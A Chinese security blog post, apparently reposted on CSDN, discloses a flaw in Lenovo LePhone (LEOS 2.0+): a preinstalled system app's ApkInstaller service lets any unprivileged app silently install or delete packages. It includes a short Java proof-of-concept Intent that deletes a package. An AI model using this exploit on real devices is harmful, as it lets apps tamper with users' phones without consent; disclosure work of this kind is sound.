乐phone手机任意软件包安装删除漏洞

最新推荐文章于 2025-11-26 16:17:36 发布
最新推荐文章于 2025-11-26 16:17:36 发布 · 103 阅读 · 0
文章标签:

#移动开发

本文章详细介绍了乐phone手机存在的严重安全漏洞,该漏洞允许未经声明权限的应用通过特定服务在系统中安装和删除任意软件包,极大地威胁了系统的安全性。文中提供了漏洞利用的POC代码,指出了影响版本范围,并给出了相关链接以供进一步研究。

本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.youkuaiyun.com/jiazhijun/article/details/8639570
作者:Jack_Jia 邮箱:309zhijun@163.com


一、漏洞描述


乐phone手机默认包含一个服务,其设计没有遵照Android安全规范,导致没有声明任何权限的应用即可在没有任何提示情况下通过该服务安装和删除任意软件包,对系统安全性产生极大影响。

二、影响版本

LEOS2.0以上版本

三、漏洞原理

乐phone手机出厂默认包含一个名为jp.aplix.midp.tools的应用包。本应用以system权限运行,并向其他应用提供ApkInstaller服务,用来进行对Apk文件的安装和删除。
通过向ApkInstaller服务传递构造好的参数,没有声明任何权限的应用即可达到安装和删除任意Package的行为,对系统安全性产生极大影响。

四、POC代码

Intent in = new Intent();
in.setComponent(new ComponentName("jp.aplix.midp.tools","jp.aplix.midp.tools.ApkInstaller"));
in.putExtra("action", "deleteApk");
in.putExtra("pkgName", "xxxxx");
startService(in);

五、相关链接


http://www.wooyun.org/bugs/wooyun-2010-0509
iteye_7514
关注
Python安全编程:避免常见安全漏洞及防范措施
AI天才研究院
08-11 695
2021年,随着AI领域的火爆、互联网平台的壮大、传统行业的转型升级,企业应用机器学习技术解决了很多问题。然而,在实际生产环境中,仍然存在一些安全风险需要注意,如数据泄露、网络攻击、程序漏洞等。本文将以实际案例出发,深入分析并总结目前已知的“Python安全编程”相关的常见安全漏洞及防范措施,为Python开发者提供一个可行的安全防护策略。静态代码检查工具的使用Python代码安全之依赖包管理文件上传漏洞SQL注入攻击CSRF跨站请求伪造密码散列函数的选择Flask框架安全配置。
通用软件产品的漏洞数量排名
maoguan121的博客
10-27 670
随着计算机网络技术的发展,全球互联网体量急速膨胀,网络安全形势日益严峻,国家政治、经济、 文化、社会及公民在网络空间的合法权益面临严峻挑战。近些年来安全漏洞数量呈现递增趋势,基于漏 洞的网络安全事件层出不穷,为我们敲响了信息安全攻防战的警钟。软件由于开发及设计等各方面的原因,存在漏洞在所难免。对安全研究人员来说,通过对漏洞发展 趋势的研究,可以在攻击者利用漏洞造成危害之前,提出及时有效的修补方案,尽可能的减少攻击事件 的发生。
iPhone BootROM 漏洞说明及威胁评估
AI-安全-功耗
07-10 284
2019年9月27日,iOS研究人员@axi0mX在twitter上发布了名为checkm8的新iOS漏洞利用工具,影响大量iPhone和iPad硬件设备。根据推文内容,该漏洞利用是一个永久的bootrom漏洞利用,影响iPhone 4S(A5芯片)到iPhone X(A11芯片)的所有设备。
小米手机藏后门可远程安装任意APP?真相如此惊悚吗?
weixin_33709219的博客
08-09 686
这个乡村爱情故事可能和今天要说的事情有点关系。 你可能已经习惯了这个场景——新手机会预装一些APP,怎么删都删不掉。但是,手机制造商将这些APP和服务安装在你手机上是否会有特别的目的?这些预装的应用又是否会威胁到机主的安全和隐私? 荷兰的一位小伙对此就颇有疑问。 他是小米4的用户。小伙有一天发现,手机预装了一个叫 AnalyticsCor...
网安瞭望台第2期:零日漏洞密集爆发、2024年常见网络安全漏洞类型及分析
不忘初心,护天下安全!
11-20 832
近日,Ubuntu 服务器(自 21.04 版本起默认安装)的 Needrestart 软件包被曝存在多个可追溯至数十年前的安全漏洞。这些漏洞允许本地攻击者在无需用户交互的情况下获取根权限,严重威胁系统安全。Qualys 威胁研究部门(TRU)于上月初发现并报告了这些漏洞,其表示漏洞极易被利用,相关用户需尽快采取行动修复。这些漏洞被认为自 2014 年 4 月 27 日 Needrestart 0.8 版本引入解释器支持时就已存在。
应用软件漏洞排名
securitypaper的博客
10-27 670
随着计算机网络技术的发展,全球互联网体量急速膨胀,网络安全形势日益严峻,国家政治、经济、 文化、社会及公民在网络空间的合法权益面临严峻挑战。近些年来安全漏洞数量呈现递增趋势,基于漏 洞的网络安全事件层出不穷,为我们敲响了信息安全攻防战的警钟。软件由于开发及设计等各方面的原因,存在漏洞在所难免。对安全研究人员来说,通过对漏洞发展 趋势的研究,可以在攻击者利用漏洞造成危害之前,提出及时有效的修补方案,尽可能的减少攻击事件 的发生。
应用软件漏洞利用分布
securitypaper的博客
10-27 1115
Adobe 公司在 2005 年收购 Flash,并大力推广应用使其一度是漏洞挖掘人员的研究焦点,根据图 3.4 的历史数据可以看到,2015 和 2016 年爆出的漏洞总数占据整体数量的 55.09%。在 Hacking Team 泄 露 CVE-2015-5122 和 CVE-2015-5199 这两个 0day 漏洞之后,更是给漏洞利用带来了通用的模板 1,但 之后随着 Adobe 引入了隔离堆、Vector 长度检测、CFG保护等安全机制,Flash 漏洞利用的门槛被加 大了很多。 图 3.4 FL
checkm基因组_checkm8漏洞利用的技术分析
cullen2012的博客
09-09 3657
checkm基因组Most likely you've already heard about the famous exploit checkm8, which uses an unfixable vulnerability in the BootROM of most iDevices, including iPhone X. In this article, we'll provide a ...
elasticserach安装的安全插件
是故事啊~关注我~
08-19 1672
elasticserach安装的安全插件 Search Guard?免费的开源的 官网:https://docs.search-guard.com/ 当涉及到Elasticsearch的简便且负担得起的安全性时,您可能会倾向于依赖基于代理的“自行拥有”安全性基础架构。本文说明了为什么这样做不是一个好主意,以及为什么不应该使用这种方法来保护生产中的敏感数据。 tl; dr:许多组织正在使用反向代理来保护其Elasticsearch基础架构。我们的观点是,代理服务器不能针对大量的广泛攻击媒介提供防御,尤其是内部
iPhone提示AirPods随行原因及解决方案解析
尽管无法直接访问文件内容,但从标签“软件开发 软件包 源码 代码包”可以推测,该资源可能封装了模拟蓝牙设备发现、解析“查找”网络响应、处理位置关联算法的相关代码模块,适用于开发者研究苹果设备间通信协议、...
掌握iPhone4越狱技巧:yellowsn0w解锁原理揭秘
cydia是一个为越狱后的iOS设备提供软件包的平台,由Jay Freeman(saurik)开发,它允许用户在越狱设备上下载和安装非官方的应用程序、插件、主题等。 yellowsn0w作为越狱工具,它的原理主要是通过利用iOS系统中的...
Ubuntu离线安装软件:Docker镜像离线部署复杂应用的策略
本文全面介绍了Ubuntu环境下Docker的安装、配置和离线部署策略,涵盖了Docker基础、镜像管理、网络与存储配置,以及优化和安全加固等方面。特别针对Ubuntu系统的离线安装软件进行了深入探讨,提供了详细的步骤与方法...
【Android15 手机+车载 音频策略实战课】:正式上线了(二百六十四)
最新发布
Android系统攻城狮
11-26 539
本篇目的:本课程基于Android15最新版本,深度讲解音频策略系统的设计架构与实战应用。从音频策略树的基础结构入手,逐步深入核心骨架、音量曲线等关键模块。再通过7个真实项目案例(Speaker改向、USB无损播放、蓝牙空间音效、定制音量曲线、Gain转换、数字耳机适配等)完整演示策略开发全流程。最后涵盖系统APP与MediaProjection的音频截取对比,帮助开发者掌握系统级音频策略定制能力。
ProGuard 指令-whyareyoukeeping使用
yeshen.org
11-25 846
proguard whyareyoukeeping
Android Gradle工程引入三方so库的方法
胡同老道的博客
11-23 198
在做安卓逆向工程的时候,有时候需要引入三方开发好的jni库,这些库可能非常老旧,甚至是32位的,本文记录引入的过程,便于快速查找。5.完成上述步骤后,即可在java文件中通过Jni.xxx引用so库中的静态方法了。3.在工程任意处加入加载so的代码,一般放到MainActivity.java中。注意,不要带lib,不要带后缀,上述so实际文件名是libplay.so。2.拷贝原工程中的jni函数定义到新工程中,1.把so库拷贝到工程中。
20251126给荣品RD-RK3588开发板跑Rockchip的原厂Android13系统时查看eMMC的csd值
南岭笑笑生之家
11-26 636
摘要:本文详细解析了RK3588开发板eMMC存储的CSD寄存器信息。通过读取的32位十六进制值"d04f01320f5903fff6dbffef96400000",确认CSD版本为2.0,支持高容量设备。关键参数包括:80ms典型读取时间、50MHz最大时钟频率、25MB/s理论传输速率、512字节标准块大小。容量计算显示约32GB存储空间(具体需精确计算)。分析表明该eMMC符合标准规范,具有中等性能但良好的兼容性,适用于嵌入式存储场景,建议优化多块传输和缓存策略以提升性能。(149
消费电子经典面试题100道-小米VIVO篇
xwb1040885790的博客
11-26 278
《消费电子经典面试题100道(小米、VIVO篇)详解》摘要: 本文整理了消费电子行业(小米、VIVO等企业)常见的100道技术面试题及详细解答,涵盖四大核心领域:移动应用开发(25题)、系统优化与性能(25题)、用户体验与交互(25题)以及AI与智能化(25题)。每个领域进一步细分为多个专业方向,如Android/iOS开发、性能优化、UI/UX设计、机器学习应用等。文章以第一道Android开发题为例,展示了高性能RecyclerView适配器的完整实现方案,包括DiffUtil异步计算、ViewHold
Android Binder 详解(3)
weixin_42065195的博客
11-26 497
ProcessState 和 IPCThreadState 是 Binder 通信的 “底层支撑框架”—— 它们隐藏了驱动交互的复杂细节(如 open、mmap、ioctl),让 BBinder 和 BpBinder 只需专注于 “业务逻辑实现” 和 “请求转发”,无需关心底层资源管理和线程调度。 理解这两个类的核心作用,就能明白 Binder 通信是如何 “跨进程”“跨线程” 高效协作的,也能更好地排查 Binder 相关的问题(如线程池阻塞、驱动 fd 泄露、死亡通知未触发等)。
PHONE手机USB驱动的安装与使用
PHONE USB驱动是针对PHONE品牌的智能手机开发的驱动程序。考虑到PHONE是联想集团旗下的智能手机品牌,其USB驱动程序会具有以下特点: 1. **兼容性**:PHONE USB驱动程序需要与多种操作系统(如Windows、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值